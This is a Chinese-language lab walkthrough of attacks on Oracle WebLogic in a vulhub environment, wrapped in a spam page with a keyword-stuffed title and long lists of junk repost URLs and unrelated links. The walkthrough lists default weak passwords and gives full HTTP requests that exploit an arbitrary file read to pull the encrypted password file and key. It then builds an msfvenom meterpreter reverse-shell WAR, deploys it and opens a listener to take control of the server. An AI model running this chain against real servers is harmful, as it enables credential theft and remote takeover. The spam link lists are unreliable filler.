当前位置：首页 > news >正文

wap免费建站广州企业年报网上申报入口

news 2025/10/23 0:59:03

wap免费建站,广州企业年报网上申报入口,宣传册制作软件app,合肥网络运营公司Weblogic 弱口令、任意文件读取漏洞环境安装此次我们实验的靶场#xff0c;是vnlhub中的Weblogic漏洞中的weak_password靶场#xff0c;我们 cd 到weak_password#xff0c;然后输入以下命令启动靶场环境#xff1a; docker-compose up -d输入以下的命令可以查看当前启…Weblogic 弱口令、任意文件读取漏洞环境安装此次我们实验的靶场是vnlhub中的Weblogic漏洞中的weak_password靶场我们 cd 到weak_password然后输入以下命令启动靶场环境 docker-compose up -d输入以下的命令可以查看当前启动的靶场环境 docker-compose ps漏洞复现首先我们可以通过本机的IP加端口号 http://192.168.41.132:7001/console/login/LoginForm.jsp来进行靶场访问如图这就是漏洞靶场的界面了弱口令漏洞这里我们可以使用弱口令来尝试登陆界面Weblogic常用的弱口令密码有如下几种: system:password weblogic:weblogic admin:secruity joe:password mary:password system:sercurity wlcsystem: wlcsystem weblogic:Oracle123这里我们使用 weblogic:Oracle123 的密码成功爆破弱口令进入后台如下图是Weblogic的后台管理界面任意文件读取漏洞我们访问这个IP地址http://192.168.41.132:7001/hello/file.jsp?path/etc/passwd这个地址存在任意文件读取漏洞我们输入这点URL后浏览器会下载一个file.htm文件 file.htm文件的内容如图所示上述步骤说明http://192.168.41.132:7001/hello/file.jsp?path这个URL路径存在任意文件读取漏洞现在我们知道了这个路径存在任意文件读取漏洞那我们该如何利用这个漏洞呢Weblogic的服务器存在两个文件密文和密钥Weblogic的服务器存储密文的绝对路径是/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat相对路径是security/SerializedSystemIni.dat密钥文件的绝对路径是/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml相对路径是config/config.xml 现在我们打开BP点击进入 Repeater 重放模块重放以下的数据包获取密文注意这里的主机IP和端口号要改成你靶机的IP和端口号 GET /hello/file.jsp?path/root/Oracle/Middleware/user_projects/domains/base_domain/security/Serialize dSystemIni.dat HTTP/1.1 Host: X.X.X.X:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8, application/signed-exchange;vb3;q0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 Cookie: JSESSIONIDXxnDkhsRVyXhvQZDkZfMz1jKwPxtMnVyvTDZTPyFP1QD2Gnq2R2F!- 1485790404 Connection: close点击 send发送数据包得到以下数据然后点击 Hex切换为 16 进制的数据格式选中以下的数据分段右键点击copy to file进行复制保存为 111.dat 文件然后我们重新发送以下的数据包获取密钥文件注意这里的主机IP和端口号要改成你靶机的IP和端口号 GET /hello/file.jsp?path/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml HTTP/1.1 Host: X.X.X.X:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8, application/signed-exchange;vb3;q0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 Cookie: JSESSIONIDXxnDkhsRVyXhvQZDkZfMz1jKwPxtMnVyvTDZTPyFP1QD2Gnq2R2F!- 1485790404 Connection: close现在我们得到了密钥的文件然后将其保存复制下来后面解密会用到接下来我们去进行 Weblogic 密文的解密 Weblogic解密工具下载地址https://github.com/TideSec/Decrypt_Weblogic_Password 此次我们使用的是这个工具https://github.com/TideSec/Decrypt_Weblogic_Password/tree/master/Tools5-weblogic_decrypt 将工具下载到本地之后我们通过以下代码启动工具 java -jar weblogic_decrypt.jar然后将文件选择为我们保存的111.dat文件密文这里填写我们获得得密钥然后点击确定成功解密出密码然后我们使用 weblogic 用户名和破解出来得密码 Oracle123 尝试登陆后台控制目标服务器我们获得用户名和密码之后尝试登陆Weblogic 的后台现在我们已经通过弱口令或者任意文件读取漏洞获得密码成功登陆了Weblogic服务器的后台界面进入到后台之后我们该如何去利用呢首先我们通过kali生成一个木马 msfvenom -p java/meterpreter/reverse_tcp lhost192.168.41.132 lport4444 -f war -o java.war点击左侧部署-安装-上载文件-选择部署上传java.war包-全部下一步- 完成上传好后的界面如图所示然后kali机器开启监听 msfconsole use exploit/multi/handler set payload java/meterpreter/reverse_tcp set LHOST 192.168.41.132 set LPORT 4444 exploit接下来我们访问 http://192.168.41.132:7001/java这个URL来触发木马回连 kali机器收到监听
文章转载自：
http://www.morning.hybmz.cn.gov.cn.hybmz.cn
http://www.morning.qqklk.cn.gov.cn.qqklk.cn
http://www.morning.fnpmf.cn.gov.cn.fnpmf.cn
http://www.morning.tkzqw.cn.gov.cn.tkzqw.cn
http://www.morning.xbmwh.cn.gov.cn.xbmwh.cn
http://www.morning.kjyqr.cn.gov.cn.kjyqr.cn
http://www.morning.plxnn.cn.gov.cn.plxnn.cn
http://www.morning.dkqr.cn.gov.cn.dkqr.cn
http://www.morning.wrtsm.cn.gov.cn.wrtsm.cn
http://www.morning.qnrpj.cn.gov.cn.qnrpj.cn
http://www.morning.hkpyp.cn.gov.cn.hkpyp.cn
http://www.morning.zhqfn.cn.gov.cn.zhqfn.cn
http://www.morning.rhpy.cn.gov.cn.rhpy.cn
http://www.morning.dwgcx.cn.gov.cn.dwgcx.cn
http://www.morning.vvbsxm.cn.gov.cn.vvbsxm.cn
http://www.morning.tnjkg.cn.gov.cn.tnjkg.cn
http://www.morning.lgxzj.cn.gov.cn.lgxzj.cn
http://www.morning.smrty.cn.gov.cn.smrty.cn
http://www.morning.rntby.cn.gov.cn.rntby.cn
http://www.morning.qjldz.cn.gov.cn.qjldz.cn
http://www.morning.wxckm.cn.gov.cn.wxckm.cn
http://www.morning.npfrj.cn.gov.cn.npfrj.cn
http://www.morning.qwbls.cn.gov.cn.qwbls.cn
http://www.morning.zlhzd.cn.gov.cn.zlhzd.cn
http://www.morning.trfh.cn.gov.cn.trfh.cn
http://www.morning.rnnwd.cn.gov.cn.rnnwd.cn
http://www.morning.bkqdg.cn.gov.cn.bkqdg.cn
http://www.morning.zlkps.cn.gov.cn.zlkps.cn
http://www.morning.sgmgz.cn.gov.cn.sgmgz.cn
http://www.morning.pmlgr.cn.gov.cn.pmlgr.cn
http://www.morning.bnmfq.cn.gov.cn.bnmfq.cn
http://www.morning.rqqmd.cn.gov.cn.rqqmd.cn
http://www.morning.dmhs.cn.gov.cn.dmhs.cn
http://www.morning.stlgg.cn.gov.cn.stlgg.cn
http://www.morning.ggjlm.cn.gov.cn.ggjlm.cn
http://www.morning.rlns.cn.gov.cn.rlns.cn
http://www.morning.sqdjn.cn.gov.cn.sqdjn.cn
http://www.morning.fkcjs.cn.gov.cn.fkcjs.cn
http://www.morning.nlysd.cn.gov.cn.nlysd.cn
http://www.morning.gcthj.cn.gov.cn.gcthj.cn
http://www.morning.jbfzx.cn.gov.cn.jbfzx.cn
http://www.morning.jzfxk.cn.gov.cn.jzfxk.cn
http://www.morning.rglp.cn.gov.cn.rglp.cn
http://www.morning.gthc.cn.gov.cn.gthc.cn
http://www.morning.gmmyn.cn.gov.cn.gmmyn.cn
http://www.morning.zdmrf.cn.gov.cn.zdmrf.cn
http://www.morning.rgkd.cn.gov.cn.rgkd.cn
http://www.morning.lnmby.cn.gov.cn.lnmby.cn
http://www.morning.gkpgj.cn.gov.cn.gkpgj.cn
http://www.morning.rtkgc.cn.gov.cn.rtkgc.cn
http://www.morning.wjlkz.cn.gov.cn.wjlkz.cn
http://www.morning.nfzzf.cn.gov.cn.nfzzf.cn
http://www.morning.qxdrw.cn.gov.cn.qxdrw.cn
http://www.morning.fnnkl.cn.gov.cn.fnnkl.cn
http://www.morning.yrkdq.cn.gov.cn.yrkdq.cn
http://www.morning.xkyst.cn.gov.cn.xkyst.cn
http://www.morning.vvbsxm.cn.gov.cn.vvbsxm.cn
http://www.morning.sgbsr.cn.gov.cn.sgbsr.cn
http://www.morning.yfphk.cn.gov.cn.yfphk.cn
http://www.morning.spqbp.cn.gov.cn.spqbp.cn
http://www.morning.mwmxs.cn.gov.cn.mwmxs.cn
http://www.morning.dfygx.cn.gov.cn.dfygx.cn
http://www.morning.tnkwj.cn.gov.cn.tnkwj.cn
http://www.morning.srbmc.cn.gov.cn.srbmc.cn
http://www.morning.qrcsb.cn.gov.cn.qrcsb.cn
http://www.morning.xxwfq.cn.gov.cn.xxwfq.cn
http://www.morning.lgsqy.cn.gov.cn.lgsqy.cn
http://www.morning.gccrn.cn.gov.cn.gccrn.cn
http://www.morning.lwnwl.cn.gov.cn.lwnwl.cn
http://www.morning.hlmkx.cn.gov.cn.hlmkx.cn
http://www.morning.lwyqd.cn.gov.cn.lwyqd.cn
http://www.morning.tralution.cn.gov.cn.tralution.cn
http://www.morning.sgmis.com.gov.cn.sgmis.com
http://www.morning.wlggr.cn.gov.cn.wlggr.cn
http://www.morning.ylxgw.cn.gov.cn.ylxgw.cn
http://www.morning.zycll.cn.gov.cn.zycll.cn
http://www.morning.cwfkm.cn.gov.cn.cwfkm.cn
http://www.morning.qmncj.cn.gov.cn.qmncj.cn
http://www.morning.prmbn.cn.gov.cn.prmbn.cn
http://www.morning.lstmq.cn.gov.cn.lstmq.cn

http://www.tj-hxxt.cn/news/241141.html

相关文章：

网站建设seo基本要求搜索引擎优化seo专员

付费小说网站建设湘潭seo公司

什么网站做海报赚钱天津网站建立

忘记网站管理员密码个人网站备案麻烦吗

南阳网站排名优化费用短视频动画制作

自己在家怎么做网站服务器农村电商c2c模式

深圳制作公司网站企业信息查询网站查询

去国外网站开发客户中的contact us 没有邮箱西安的互联网营销公司

做家教中介网站赚钱吗网站模板 wordpress带会员系统

山东坤泰建设集团网站网页转微信小程序

网站域名怎么买wordpress本地批量传文章

如何做自己的淘客网站苏州机械加工网

做餐饮培训网站广告昆山高端网站建设

南昌模板建站定制网站做网站gif代码

门户网站的细分模式有wordpress储存媒体插件

网站备案才能使用网站首页页面代码

东莞有哪些做网站做电影网站心得体会

做软件赚钱的网站有哪些网页设计作业可爱的家乡

腾讯云备案网站名称大型网站建设就找兴田德润

梧州网站设计推荐广告联盟怎么接单

建立网站站点的过程购物网站如何备案

腾讯云服务器可以做网站网站设计制作步骤

com网站注册域名网站设计制作要多少钱

建设银行网站认证wordpress的编辑器插件

曲阜网站建设价格wordpress 知识库主题

微网站菜单绮思网站建设qswoo

制作网页的软件有淘宝怎么优化关键词步骤

做网站需要招什么职位wordpress内置采集插件

郑州优之客网站建设重庆网站推广流程

网站开发外文期刊网北京建设网站公司